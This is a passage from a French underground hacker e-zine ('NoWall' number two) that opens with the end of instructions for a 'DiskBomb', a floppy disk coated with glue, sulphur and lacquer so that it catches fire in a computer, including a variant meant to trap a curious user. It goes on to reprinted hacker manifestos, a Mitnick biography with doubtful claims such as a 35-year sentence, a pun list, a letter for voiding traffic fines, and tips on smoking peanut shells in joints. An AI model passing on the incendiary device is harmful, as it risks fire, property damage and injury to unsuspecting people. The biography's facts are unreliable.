		pastule)
		- Du souffre (grattez le bout des allumettes si vous n'en trouvez pas)
		- De la laque ou du déodorant (facultatif, c'est moi qui ait pensé à ça)


	*** Procédure ***

	Ouvrez la disquette en faisant bien attention à ne pas casser le plastique et ouvrez les
deux bouts de coton de chaque côté du disque.

	Enduisez les deux côtés (un seul suffit, mais deux, c'est plus efficace) du disque avec 
une bonne couche de vernis ou de colle, et recouvrez les de souffre (moi, c'est comme ça qu'on 
m'a appris, mais après mûre réflexion, je me suis dit qu'il n'y avait besoin de recouvrir qu'une
languette : la surface qui ne sera pas protégée par le plastique ensuite).

	Remettez les deux bouts de plastique sur le disque (la colle ou le vernis fera office 
d'agent collant) en faisant bien attention à ce que votre recollage ressemble encore à une 
disquette.

	Vaporisez de la laque sur le plastique du DiskBomb.

	Mettez la disquette dans un ordinateur, allumez-le, et partez vite !

	Existe aussi la variante d'allumer l'ordi, mettre la disquette dans le lecteur et 
attendre qu'un petit curieux ou une petite curieuse veuille regarder ce qu'il y a dessus.


	*** Pourquoi ça marche ? ***

	Ben c'est bien simple, dans le lecteur-disquette, il y a quelques étincelles quand 
l'ordi s'allume et vérifie si le lecteur est vide ou quand on veut regarder sur une disquette,
la tête de lecture frotte le disque ; le souffre va alors prendre feu (c'est le principe de 
l'allumette, pour le neu-neu qu'aurait pas compris ;-P), et la laque (ou le déodorant) étant 
très inflammable, ça va prendre fau aussi, et tout le lecteur-disquette va crâmer, puis ce feu 
de joie va se répandre dans l'unité centrale... Et boum ! Plus d'ordinateur !



	*********************************
	*** L'ETHIQUE DU HACK MODERNE ***
	*********************************

	[Ce texte n'est pas de moi et je ne connais pas son auteur, mais il m'a bien plu, donc je
le mets là en espérant que j'aurais pas de procès au cul pour vol de copyright :o) ]

	Les Hackers sont une espèce d'humains (ou d'aliens) qui utilisent la technologie de 
manière créative pour continuer à "apprendre en faisant" dans le domaine de la technologie. 
	
	Le hack est bien plus que le simple plaisir de prendre le contrôle d'un ordinateur tenu 
par des gens qui ont dépensé beaucoup d'argent et d'années d'étude pour être capables de 
diriger ces machines. Il faut voir le "plaisir de déconner avec les ordinateurs de l'armée 
américaine" éprouvé par des 14-17 ans dans le contexte de la situation sociale de teenagers que
le football ou la discothèque n'amusent pas, mais qui se sentent réussir quelque chose en 
explorant des systèmes informatiques. 
	
	Les ordinateurs leur semblent simplement plus sexy que les filles maquillées qui 
regardent de haut leur insécurité - et plus faciles, en tout cas, à maîtriser. 
	
	Mais le hacking a aussi un côté sérieux - qui n'a pas grand-chose à voir avec la 
fascination de la technologie. Il croit en la liberté de l'information. 
	
	Entre ces deux faces du hacking, se tient la compréhension de la technologie - celle du 
système téléphonique ou des ordinateurs en réseau. Une compréhension qui inclut évidemment la 
compréhension des objectifs de la technologie. 
	
	Les ordinateurs n'ont jamais été faits pour garder l'information secrète. Ils ont été 
conçus pour traiter, distribuer et organiser l'information - pas pour la cacher à quelqu'un. Il
s'est passé la même chose avec le téléphone; on l'a inventé pour que les gens se parlent. 
Ensuite est venu le compteur d'unités - une technologie "ajoutée". Comme on a ajouté des 
logiciels aux ordinateurs pour éviter que tout le monde puisse accéder à une information. 
	
	Le "hacking" devient plus sérieux quand il se base sur ce bon côté de la technologie pour
en tirer un programme politique - nous entendons par là l'organisation active de la vie, et non
la merde qu'on nous fourgue aujourd'hui sous le nom de politique. L'éthique du hacker a été 
créée au MIT, et comprend six règles : 

	¤ L'accès aux ordinateurs - et à tout ce qui peut nous apprendre comment le monde marche 
vraiment - devrait être illimité et total. 

	¤ L'information devrait être libre et gratuite. 

	¤ Méfiez-vous de l'autorité. 

	¤ Encouragez la décentralisation. 

	¤ Les Hackers devraient être jugés selon leurs oeuvres, et non selon selon des critères 
factices comme la position, l'âge, la race ou les diplômes. 

	¤ On peut créer l'art et la beauté sur un ordinateur. 

	
	Les ordinateurs sont faits pour changer la vie. Il n'est pas nécessaire de lire "Hackers",
le livre de Steven Levy, pour réaliser que c'est l'esprit des années 70 qui souffle dans ces 
principes. Au MIT, le besoin de libérer l'information répondait à un besoin pratique de 
partager le savoir pour améliorer les capacités de l'ordinateur. 

	Aujourd'hui, dans un monde où la plupart des informations sont traitées par ordinateur, 
ce besoin est resté le même - mais il s'étend à tous ceux qui vievent sur cette planète et ont 
l'intention d'y faire quelque chose, plus seulement aux fondus de l'ordinateur ! 

	Le hack était (et est encore) la meilleure solution à un problème - exprimé dans un très 
court code de software ("software" contenu dans le cerveau humain inclus). 

	"L'information est le pouvoir" est une réponse un peu trop facile pour expliquer le désir
de rendre toute l'information libre. Mais la pensée anarchiste (au sens où les choses 
pourraient trouver leur ordre sans recours à des structures d'autorité) qui vise à agrandir la 
capacité d'action en donnant l'information au peuple joue un grand rôle dans le jeu du hack. 
Les services secrets sont les ennemis naturels du hacker - parce qu'ils institutionnalisent le 
secret d'état. 

	D'un autre côté, il existe aussi un besoin de protéger la vie privée dans une société 
d'information - en utilisant la cryptographie. La version actuelle des principes du hack a donc
deux règles de plus, qui prennent en compte le nouveau rôle des ordinateurs dans la société : 

	¤ Ne jouez pas avec les données des autres. 

	¤ Favorisez l'accès à l'information publique, protégez le droit à l'information privée. 

	
	Le hacking est bien plus qu'une simple connaissance de la technologie. Parvenir à se 
procurer une information qu'on ne veut pas donner au public, et la diffuser largement, c'est 
aussi cela, être un hacker. 



	*******************************
	*** LA CONSCIENCE DU HACKER ***
	*******************************

	[Ce texte extêmement célèbre dans la communauté UnderGround a été écrit par The Mentor le
8 janvier 1986, et traduit par NeurAlien le 8 septembre 1994, mais comme il est toujours 
d'actualité, je le mets ici, et j'encule ceux qui disent que ça sert à rien de le mettre parce
qu'on le trouve autre part et patati et patata, parce que NoWall est mon e-zine et je mets ce
que je veux dedans sans avoir de compte à rendre à personne ! Na !]	
	Un autre s'est fait prendre aujourd'hui, c'est partout dans les journaux. "Scandale : Un 
adolescent arrêté pour crime informatique, arrestation d'un "hacker" après le piratage d'une 
banque"...

    	Satanés gosses, tous les mêmes.

	Mais avez-vous, dans votre psychologie en trois pièces et votre profil technocratique 
de 1950, un jour pensé à regarder le monde derrière les yeux d'un hacker ?  Ne vous êtes-vous 
jamais demandé ce qui l'avait fait agir, quelles forces l'avaient modelé ?
        
	Je suis un hacker, entrez dans mon monde...
      
	Le mien est un monde qui commence avec l'école... Je suis plus astucieux que la plupart 
des autres enfants, les conneries qu'ils apprennent me lassent...

    	Je suis au collège ou au lycée. J'ai écouté les professeurs expliquer pour la quinzième 
fois comment réduire une fraction. Je l'ai compris. "Non Mme Dubois, je ne peux pas montrer mon
travail. Je l'ai fait dans ma tête."

   	Satané gosse. Il l'a certainement copié. Tous les mêmes.

    	J'ai fait une découverte aujourd'hui. J'ai trouvé un ordinateur. Attends une minute, 
c'est cool. Ca fait ce que je veux. Si ça fait une erreur, c'est parce que je me suis planté.
     
	Pas parce qu'il ne m'aime pas...
      
	Ni parce qu'il se sent menacé par moi...
      
	Ni parce qu'il pense que je suis un petit filoux...
      
	Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas être là...
        
	Satanés gosses. Tout ce qu'il fait c'est jouer. Tous les mêmes.

      
	Et alors c'est arrivé... Une porte s'est ouverte sur le monde... Se précipitant à travers
la ligne téléphonique comme de l'héroïne dans les veines d'un accro, une impulsion électronique
est envoyée, on recherche un refuge à l'incompétence quotidienne... un serveur est trouvé.

     Vous vous répetez que nous sommes tous pareils... On a été nourris à la petite cuillère de
bouffe pour bébé à l'école quand on avait faim d'un steak... Les fragments de viande que l'on 
nous a laissés étaient prémachés et sans goût. On a été dominés par des sadiques ou ignorés par
des apathiques.  Les seuls qui avaient des choses à nous apprendre trouvèrent des élèves 
volontaires, mais ceux-ci sont comme des gouttes dans le desert.

	C'est notre monde maintenant... Le monde de l'électron et de l'interrupteur, la beauté du
baud. Nous utilisons un service déja existant, sans payer ce qui pourrait être bon marché si ce
n'était pas la propriété de gloutons profiteurs, et vous nous appelez criminels... 

	Nous explorons... et vous nous appelez criminels.  

	Nous recherchons la connaissance... et vous nous appelez criminels.  

	Nous existons sans couleur de peau, sans nationalité, sans dogme religieux... et vous 
nous appelez criminels.

	Vous construisez des bombes atomiques, vous financez les guerres, vous ne punissez pas 
les patrons de la mafia aux riches avocats, vous assassinez et trichez, vous manipulez et nous 
mentez en essayant de nous faire croire que c'est pour notre propre bien-être, et nous sommes 
encore des criminels.

	Oui, je suis un criminel. Mon crime est celui de la curiosité. Mon crime est celui de 
juger les gens par ce qu'ils pensent et disent, pas selon leur apparence. Mon crime est de vous
surpasser, quelque chose que vous ne me pardonnerez jamais.

	Je suis un hacker, et ceci est mon manifeste. Vous pouvez arrêter cet individu, mais 
vous ne pouvez pas tous nous arrêter... après tout, nous sommes tous les mêmes.




	***************************************************
	*** KEVIN MITNICK, UN CONDOR PARMI LES VAUTOURS ***
	***************************************************

	[J'ai pompé un texte je sais plus trop où, je l'ai modifié et j'ai rajouté deux-trois 
trucs, et maintenant, vous avez ce texte. Mais si vous voulez en savoir plus au sujet du Condor,
je vous conseille vivement de lire "l'Intrus", de Jon Littman, qui est un excellent bouquin]


	Kevin Mitnick... A lui seul, ce nom évoque toute une légende : celle du hacker qui 
"hactivait" sous le nom de "The CONDOR". 

	Sur cette page, les exploits et la chute de "la dite" légende du hack, qui a été la taupe 
la plus recherchée des Etats-Unis.  
        
	La story du CONDOR commence très tôt : Adolescent, il aurait détourné le service des 
renseignements téléphoniques américain basé sur le même principe que notre 12 National. Quand 
un abonné appelait pour s'informer sur un numéro de téléphone, il tombait sur Mitnick ou sur un
de ses complices qui répliquait : "La personne que vous recherchez est-elle blanche ou noire, 
Monsieur ? Car nous tenons deux répertoires distincts."

	On lui attribue aussi l'une des premières passes à l'encontre du Pentagone, il y 
retournera par la suite une bonne centaine de fois. L'un des jeux du CONDOR était aussi de se 
balader dans les systèmes téléphoniques américains pour y déconnecter le téléphone de ses 
ennemis ou pour "simplement" changer leur nom d'abonné en James Bond. Lors de sa cavale, il 
s'est attribué des numéros de téléphone, un bon millier, dont les trois derniers chiffres 
finissaient par 007. Pour finir dans ce qui est connu, Mitnick aurait déjoué les barrières du 
laboratoire de mise à feu de la NASA à Pasadena ; du réseau de l'Université de Leeds en 
Angleterre ; de l'unité centrale de la défense aérienne américaine, dans le Colorado et surtout
le système de localisation d'appels du FBI. C'est ici que la traque commence, le Fédéral Bureau 
of Investigation n'a pas apprécié d'être visité de la sorte. Pour vous donner une idée, 
un visiteur qui accède dans un immeuble du FBI, est fouillé, aucun document ne peut ni rentrer, 
ni sortir, même pas un rouleau de papier toilette, alors imaginez un mec qui se promène dans 
toutes les machines et diffuse en libre accès les documents qu'il a volé. Cette cavale durait 
depuis trois ans, jusqu'à ce jour de décembre 1994, ou, par défit, il s'attaqua aux ordinateurs 
de Tsutomu Shimomura. Le CONDOR souhaitait faire un tour à cet ancien ami passé à l'ennemi.

	Tsutomu Shimomura est l'autre Hacker de l'histoire. Cet américain âgé de 30 ans a sauté 
le mur de l'interdit en proposant ses services dans la sécurité informatique. Il a développé 
toute une gamme d'outils capables de détourner les systèmes téléphoniques cellulaires, mais 
aussi toute une série de programmes permettant de piéger à coup sur n'importe quel pirate. Il 
s'est taillé une excellente réputation. Le FBI, l'Us Air Force ou encore la NSA, font partie de
ses clients.

	Plus le système est protégé plus on s'amuse. Alors jouons... 

	Le 26 décembre,Shimomura est chez lui, il se prépare à partir en vacances, quand il 
reçoit un appel de ses collègues du Centre de calcul de San Diego. Quelqu'un s'est introduit la
nuit précédente dans les ordinateurs installés dans sa maison de vacances, à Del Mar, et a 
"volé" des centaines de documents et de logiciels. Le hacker a exploité une faille notoire dans 
l'architecture du réseau Internet, faisant croire à l'ordinateur de Tsutomu Shimomura que le 
message venait d'une source autorisée - en l'occurrence, un ordinateur de la Loyola University 
de Chicago utilisé comme passerelle.

	Habile, certes, mais le pirate ne s'est toutefois pas aperçu que Shimomura a programmé des 
firewalls d'un genre particulier, ces derniers envoient toutes les heures une copie de leur 
index à un autre ordinateur - ce qui a produit une alerte automatique. Un mois plus tard, 
Shimomura reçoit un deuxième coup de fil. L'opérateur d'un service commercial d'accès à 
Internet, le W.e.l.l. ("Whole Earth Lectronic Link") de Sausalito, l'informe que les documents
volés à Del Mar ont été déposés dans son ordinateur par un inconnu. Dans ces documents, entre 
autres, les feuilles de salaires de Shimamoura, des contrats et surtout tous ses mots de passe. 
Tsutomu Shimomura et une petite équipe du Centre de calcul s'installent alors à Sausalito, 
branchent une série de portables sur le réseau interne du W.e.l.l., mettent en place un système 
de surveillance, et commencent à observer l'activité du pirate.

	Dorénavant chaques frappes de ce dernier s'affichent sur leurs écrans. Le 17 janvier, ils 
l'observent alors qu'il infiltre le système de Motorola, il accède à l'ordinateur censé 
protéger le réseau interne et dérobe, le logiciel de sécurité. Il semblerait, mais personne ne 
pourra le prouver, que c'est à partir de cette passe, que le FBI aura accès au décryptage des 
communications entre mobiles.

	Quelques jours plus tard, Tsutomu et ses associés détectent le vol de 20 000 numéros de 
cartes de crédit appartenant aux clients de Netcom, un des principaux fournisseurs d'accès à 
Internet, basé à San José. Ils s'y déplacent et recommencent la traque. Mitnick, connaît son 
affaire, ses appels passent par trois villes : Denver, Minneapolis, et Raleigh. Ce n'est qu'en 
comparant longuement les registres des compagnies téléphoniques à ceux de Netcom que Shimomura 
et ses collègues acquièrent la conviction que le pirate se trouve à Raleigh. Le hacker utilise 
un téléphone cellulaire pour se connecter à plusieurs points d'accès de Netcom afin d'éviter 
d'être localisé. A Raleigh, les appels semblent entrer par un central de la compagnie 
téléphonique GTE, dont les listings en renvoient toutefois l'origine chez une autre compagnie : 
SPRINT. Grâce à une brillante manipulation des logiciels du réseau, GTE pensait que les appels 
venaient de Sprint, et vice versa. Aucune des deux compagnies n'avaient donc de données sur 
l'utilisateur du téléphone (ni ne lui a jamais envoyé de facture d'ailleurs !).

	Le numéro identifié, pendant deux jours Shimomura parcours les rues de Raleigh avec une 
antenne de détection, et localise enfin l'appartement où habite Kevin Mittnick. Selon d'autre 
dire, c'est ici qu'apparaît l'une des premières utilisations du système TEMPEST.

	A deux heures du matin, le 15 février 1995, le FBI et Shimomura investissent le nid du 
CONDOR. "Salut Tsutomu! Félicitations", aurait dit MITNICK.

	Ceux qui l'ont rencontré ou ont étudié ses agissements le décrivent comme un jeune homme 
d'une intelligence limitée, spécialisée, très réservé et méfiant. Un perdant doué d'un talent 
extraordinaire sur ordinateur, le seul endroit où il excellait. Les gens avaient peur de lui, 
comme d'un magicien un peu fou. Non sans raison : les talents techniques de Mitnick avaient de 
quoi faire trembler la planète. Mais jamais il n'a essayé de tirer un profit de ce qu'il savait,
ni effacé ou altéré les mémoires informatiques qu'il parvenait à percer. Il n'a d'ailleurs 
jamais utilisé les numéros de cartes de crédit qu'il ait eu en sa possession.

	Il faisait ça pour la beauté du geste, pour défier ceux qui sont en charge de la sécurité 
informatique. "Kévin se moquait des grosses entreprises comme du FBI, et c'est pour ça qu'il a 
fini par représenter une menace" : a déclaré son ex-femme. "Il leur a prouvé qu'ils étaient 
vulnérables, et eux ne voulaient surtout pas que ça se sache." 

	Kévin Mitnick a écopé d'une peine de trente-cinq ans de prison. Il ne peut téléphoner 
qu'à son avocat, sa mère et sa grand-mère. Pourquoi une telle méfiance ? On craint qu'il amorce
un virus, en appelant un autre numéro quelque part dans le monde. Un numéro qui enclencherait 
une bombe informatique pré-programmée.

	En décembre 1997, les amis du Condor, le groupe Pants/Hagis ont menacé les systèmes 
informatiques de la planète d'une infection virale de leur cru. Ils demandaient la libération 
du hacker emprisonné à Los Angeles. Le message d'avertissement est apparu très brièvement sur 
le moteur de recherche Yahoo, ainsi que quelques semaines plus tard, sur le site de l'Unicef, 
de l'Unesco, du FBI et de l'U.S. air force. En 1998, la guerre d'usure continue, avec des 
passes une nouvelle fois sur le site du FBI et sur le site du journal le New-York Times. En 
1999, depuis janvier 1999, les attaques de sites demandant la liberation de Mitnick ont doublé. 
Le jugement du Condor doit reprendre le 20 Avril 1999. La justice americaine ne souhaite pas 
relacher le pirate qui doit servir d'exemple. Le dossier sur Mitnick comprend pas moins de 
2 millions de documents.

	Aux dernières nouvelles, Kevin David Mitnick a été relaché courant janvier 2000 et il a
OFFICIELLEMENT l'interdiction ne toucher à aucune bécane informatisée... 

	Moi, ce que j'en pense, et j'ai eu des confirmations de la part d'un ami sûr que je
remercie au passage (il se reconnaîtra, je lui fait confiance... Spéciale dédicace à toi, ma
poule !!!) c'est qu'il a un bon travail bien rémunéré pour le compte de l'Etat Américain, dans 
une agence qui porte le nom de DIA, un "parent" de la CIA... Mais faut pas le dire !!!




	*************************
	*** WARES EN PAGAILLE ***
	*************************


	Bon, ben on vient de se faire un article d'anarchie, deux articles sur la mentalité du 
hacker et une petite bio de Mitnick et on a la tête bien chargée, alors on va se faire un petit
truc bien marrant (si vous êtes encore à même de comprendre des jeux de mots bien vaseux)...

	De nos jours, tous les différents logiciels portent des noms à consonances anglaises ;
un employé du Front de la Sauvegarde de la Divine Langue Française (Mouarf ! Une jolie connerie
que je viens d'inventer là !) a tenté de les traduire et je vous présente en totale exclusivité
le résultat de son travail (non, en fait, c'est ma tante qui m'a envoyé ça ! Narf !) :


	Abreuvware : serveur de réseau
	Assomware : logiciel très difficile à comprendre
	Aurevware : procédure de sortie d'un logiciel
	Baigneware : logiciel de nettoyage du disque rigide
	Boudware : logiciel dédié à la méditation
	Cherware : logiciel qui coûte la peau des fesses
	Cibware : logiciel mal fait qui nous fait sacrer lorsqu'on l'utilise
	Coulware : réseau local d'une entreprise
	Dépotware : poubelle sous Windows
	Dispensware : centre support antivirus
	Dortware : logiciel plate à dormir debout
	Égoutware : logiciel qui filtre les données inutiles
	Embaumware : logiciel dédié à l'archivage de longue durée 
	Entonware : logiciel de compression de données
	Footware : logiciel pied 
	Funware : logiciel de plaisir excessif
	Gratware : application graphique de lissage de contours
	Isolware : logiciel d'application électorale ou pornographique
	Manware : logiciel raciste
	Mirware : logiciel de copie 
	Mouchware : logiciel antivirus
	Oratware : application "essence ciel" 
	Purgatware : logiciel d'enfer
	Promontware : logiciel d'observation 
	Promouvware : logiciel de démonstration
	Rotisware : salle informatique mal climatisée
	Suppositware : logiciel de merde
	Tirware : logiciel spécialisé dans le rangement des dossiers
	Tupperware : réunion de directrices de plusieurs entreprises
	Vatferware : logiciel de contrôle d'accès 
	Vasyware : logiciel de recherche



	**********************************
	*** COMMENT FAIRE SAUTER UN PV ***
	**********************************

	  
	Regardez bien votre PV ; s'il manque l'un de ces éléments, c'est un vice de forme, vous 
pouvez donc le faire sauter (Youpiiiiiie !!!): 

		    * Nom ou numero de matricule de l'agent de police
		    * Date et Heure de la contravention
		    * Nature de l'infraction
		    * Nom et Date de Controle par Radar (si c'est par radar)

	  Ne payez pas votre prune et envoyez au merveilleux Tribunal de Police une lettre dans 
ce style :

	  "M. l'Officier du Ministère Public, en date du <date de votre prune> j'ai été l'heureux 
récepteur de la contravention n° <numéro de votre pv>. Or j'ai constaté qu'il manquait 
l'élément suivant sur cette contravention : <élément manquant> ; je ne suis donc pas en mesure 
de contrôler l'exactitude des circonstances dans lesquelles je l'ai reçu. En vertu de l'article
429 du Code de Procédure Pénale et de l'Arrêté du 14 Mai 1990, cette contravention ne peut être
considérée autrement que nulle et invalide pour non conformité avec la loi. En conséquence de 
quoi je vous serais obligé de bien vouloir procéder à l'annulation de cette contravention ainsi
qu'au remboursement des frais postaux dus à la présente lettre."

	  Envoyez-le en recommandé, avec accusé de réception. 

	  Il arrive souvent que ces fourbes vous annule le PV mais ne vous rembourse pas les 
frais du recommandé, mais bon, faut pas leur en vouloir ;o)




	***************************
	*** FUMER DE L'ARACHIDE ***
	***************************

	[De plus en plus fou, je vous insulte en écrivant mes articles !!! Je précise que vous
avez peut-être déja lu cet article et celui du dessus, mais qu'ils étaient signés d'un autre de
mes pseudos]


	  Les cacahuètes, pour toi, petit rebelle en herbe, c'est des choupettas décortiquées et 
salées que tu t'enfournes à l'apéro en même temps que ton Canada Dry ou ton Mister Cocktail 
(Gulps ! C'est vrai, t'es un vrai hors-la-loi : tu bois de la bière !), et ben mon p'tit père, 
apprends qu'on peut faire moultes choses avec des écorces d'arachide (l'autre nom de la 
cacahuète, si t'es pas au courant, p'tit junkie),... 
			
	  Donc, commençons par le commencement, jeune Chevalier du Grand Ordre de la Rebellion 
Suprême : va acheter des cacahuètes complètes avec leur écorce et tout et tout et laisse tomber
tes putains de saloperies salées à 500 milliards de calories le kilo !

	  A y est ? Tu les as tes choupettas ? Bien ! Ben maintenant, décortique-les !

	  Fini ? T'as viré l'écorce de tes tonnes d'arachides ? Bravo !!! Quelle agilité, jeune 
criminel du web qui fait des trucs pas très légaux parce que t'es un hacker membre de 
l'UnderGround ! Donc, d'un côté, tu as tes écorces, de l'autre, tes arachides.

	  Commençons par les arachides (on va pas les jeter quand même !) : sois tu les aimes 
nature et tu les mets dans un sachet à l'abri de l'humidité ; sois tu les aimes salés et tu les
mets dans un saladier de sel, à l'air libre, pendant 1 journée, puis tu les récupère et tu les 
mets là aussi dans un sachet imperméable à l'humidité ; sois tu les aimes en nougat, et tu 
ouvres le livre de cuisine de ta grand-mère pour faire du nougat, parce que même si je suis 
génial, je m'appelle pas Maïté ; sois tu les aimes glacées (pourquoi pas ?) et tu les mets dans
une assiette au frigo ; sois tu les aimes moisies (LOL) et tu les mets dans un bol que tu 
laisses pendant quelques semaines dans ton jardin ou sur ton balcon.

	  STOP !!! 

	  Chapitre gastronomique terminé ! On passe aux choses sérieuse, jeune Jedi de la 
Renégation !

	  Donc, je disais, sale branleur de merde, tu écrases les écorces jusqu'à quelles soient 
comme du tabac, et tu te roules un trois feuilles avec ça !!! Tu verras, c'est assez marrant 
comme effet, mais pas toujours très simple à rouler.

	  Maintenant, chapitre un peu plus gore : le tabac, c'est tabou, on en viendra tous à 
bout !!! Et oui, jeune guerrier farouche, le tabac, c'est caca-beurk pour les poumons et le 
système cardio-vasculaire ! Alors quand tu te feras des spliff-parties avec tes autres potes 
trous du cul, tu ne couperas pas tes oinjes avec du tabac, mais avec des écorces d'arachide ! 
De une, c'est moins cher, et l'argent ne tombe pas du ciel, petite pourrissure de l'Etat, de 
deux, l'effet est bien meilleur pour le délire et pour la santé !

	  Voilà ! Maintenant, tu as les clés pour devenir un Grand Maître Jedi du Spliff à 
l'Arachide, jeune Padawan (quelle merde l'Epidode 1 de Star Wars !!! .


	


                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |           O U T R O           |
                            |                               |
                            ---------------------------------


	Et voila ! C'est fini ! Le NoWall numéro deux s'achève là !!!

	J'espère écrire un numéro trois un de ces jours, mais ce serait sympa si vous pouviez
m'envoyer vos articles, parce que tout seul, je vais avoir du mal à aller bien loin. Je
recherche particulièrement des trucs qui parlent de :

		- Cracking (moi, c'est vraiment pô mon truc)
		- Phreaking avec des téléphones cellulaires 
		- Hacking sous Linux/UNIX (wouah ! Là, faut être une Elite !!! LOL)
		- Intrusions de réseau
		- Conneries, délires, passe-temps débiles, etc...
		- Contre-culture
		- Drague de filles ;oP
		- Tout autre connerie s'insérant dans le cadre d'un e-zine.


	Voici aussi quelques greetz, parce que, moi aussi, j'ai des contacts, alors chuis pas un
lamer de merde, passque mes potes à ouam, c'est des 3L1t3Z !!!

		- Clad Strife et ACiD BuRN du HKWD Clan
		- Randall Flagg pour son Randall-Book que vous trouverez en fichier joint et pour
		sa bonne humeur et son amitié indéfectible
		- la mAdteAm, avec une spéciale dédicace à Wolf et CYBz
		- toute la team des CDW, parce qu'ils sont franchement délirants
		- Thomas, plus connu sous le nom de ********* (vous le saurez pas ! Nananère !)
		- Manu, qui est toujours à mon écoute et qui me livre quelques secrets
		- CyberJunkie, un pote avec qui on emmerde les emmerdeurs
		- The Brain, parce que j'ai niqué son site 4 fois et qu'il a pas porté plainte
		- Laurence, une fille de ma classe avec qui j'adore parler
		- tous ceux que j'oublie mais qui m'ont appris et aidé


	Tiens, j'y pense ! Et pourquoi ne pas former un crew ? Remarquez, je sais pas trop
finalement : un crew, faut le gérer, faut coordonner les membres, faut faire un beau site,
faut faire la promo, faut se répartir le travail pour un e-zine pour pas tous écrire la même
chose et gnagnagnagnagna et gnagnagnagnagna...
	
	Mouais, je vais y réfléchir quand même... Mais si vous avez une proposition à me
faire, envoyez-la moi à RavenShadow@ifrance.com et je vous dirais si ma grandissime personne
à l'obligeance de condescendre à rejoindre les maigres rangs de votre crew, parce que quand 
même, moi, je l'aime ma liberté !

	
	Bon, ben voila, on y est, c'est la fin,... J'ai envie de pleurer, mais j'suis pas une
taffiole ! Alors je vais rester droit et fière, le regard guerrier, et vous adressez mes
salutations distinguées.

	AU REVOIR ET RENDEZ-VOUS DANS LA TROISIEME COMETE DE NOWALL !!!!



		  	

			 ____________________________________________________
		 	|						                 |
			|	 	        RavenShadow			     |
			|						                 |
			|  	        RavenShadow@ifrance.com		     |
			|						                 |
			|						                 |
			|      "La Chance sourit aux esprit éclairés"        |
			|                                                    |
			|____________________________________________________|






